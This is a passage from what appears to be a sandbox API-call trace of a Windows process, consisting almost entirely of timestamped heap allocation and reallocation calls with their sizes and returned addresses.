lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x55eeb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10014) returned 0x5a2ee0 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x580290 [0261.658] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x580290, Size=0x20) returned 0x559c10 [0261.658] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559c10, Size=0x40) returned 0x55ad60 [0261.658] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ad60, Size=0x80) returned 0x59eef0 [0261.658] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x5a1368 [0261.658] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a1368, Size=0x200) returned 0x5a1368 [0261.658] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a1368, Size=0x400) returned 0x5a1368 [0261.658] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a1368, Size=0x800) returned 0x5a1368 [0261.658] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a1368, Size=0x1000) returned 0x5b2f00 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x5802e8 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x580290 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x580260 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x5a20c8 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x580278 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x4) returned 0x5a20f8 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x580248 [0261.658] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a20c8, Size=0x8) returned 0x5a20e8 [0261.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5802a8 [0261.659] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a20e8, Size=0x10) returned 0x5a0f80 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a0f98 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a0fb0 [0261.659] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a0f80, Size=0x20) returned 0x559c10 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a0f80 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a20e8 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a0fc8 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a0fe0 [0261.659] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x559c10, Size=0x40) returned 0x55ad60 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a0ff8 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a1010 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a1028 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a1040 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1058 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1070 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a20c8 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1088 [0261.659] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x55ad60, Size=0x80) returned 0x59eef0 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a10a0 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a10b8 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a10d0 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a10e8 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1100 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1118 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1130 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2128 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1148 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1160 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1178 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1190 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a11a8 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a11c0 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a11d8 [0261.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a11f0 [0261.660] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59eef0, Size=0x100) returned 0x570ef8 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1208 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1220 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1238 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5a1250 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1268 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1280 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2108 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1298 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a12b0 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a12c8 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5a2138 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a12e0 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a12f8 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2148 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1310 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1328 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1340 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1380 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1398 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a13b0 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5a13c8 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a13e0 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5a13f8 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1410 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1428 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1440 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1458 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2158 [0261.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1470 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1488 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a14a0 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a14b8 [0261.661] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x570ef8, Size=0x200) returned 0x5a1768 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a14d0 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2168 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a14e8 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1500 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1518 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1530 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1548 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1560 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1578 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1590 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a15a8 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a15c0 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a15d8 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a15f0 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1608 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1620 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1638 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1650 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1668 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1680 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1698 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a16b0 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a16c8 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2178 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a16e0 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a16f8 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1710 [0261.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2188 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1728 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1740 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1988 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a19a0 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a19b8 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a19d0 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a19e8 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1a00 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1a18 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1a30 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1a48 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1a60 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1a78 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1a90 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1aa8 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1ac0 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1ad8 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1af0 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1b08 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1b20 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1b38 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2198 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5a21a8 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1b50 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1b68 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1b80 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1b98 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1bb0 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1bc8 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1be0 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1bf8 [0261.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1c10 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1c28 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1c40 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1c58 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1c70 [0261.663] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5a1768, Size=0x400) returned 0x572ee0 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1c88 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1ca0 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1cb8 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1cd0 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1ce8 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1d00 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x5a1d18 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1d30 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5a1d48 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573300 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a21b8 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573318 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x573330 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573348 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573360 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573378 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573390 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x5733a8 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5733c0 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5733d8 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5733f0 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573408 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573420 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573438 [0261.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573450 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573468 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a21c8 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573480 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573498 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5734b0 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5734c8 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5734e0 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5734f8 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573510 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573528 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573540 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x573558 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573570 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x573588 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5735a0 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5735b8 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5735d0 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5735e8 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573600 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x573618 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573630 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573648 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573660 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573678 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573690 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5736a8 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5736c0 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573700 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573718 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573730 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573748 [0261.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573760 [0261.665] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573778 [0261.665] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573790 [0261.665] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5737a8 [0261.665] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5738e0 [0261.782] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5738f8 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x573910 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x12) returned 0x55a438 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573928 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573940 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573958 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573970 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573988 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5739a0 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5739b8 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5739d0 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x5739e8 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573a00 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573a18 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573a30 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573a48 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573a60 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573a78 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573a90 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573aa8 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x573ac0 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b490 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b4a8 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b4c0 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b4d8 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b4f0 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xe) returned 0x57b508 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b520 [0261.783] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2208 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b538 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2218 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b550 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b568 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b580 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b598 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b5b0 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b5c8 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b5e0 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b5f8 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b610 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b628 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b640 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b658 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc) returned 0x57b670 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b688 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5a2228 [0261.784] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa) returned 0x57b6a0 [0261.784] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x572ee0, Size=0x800) returned 0x57b878 [0261.784] lstrlenW 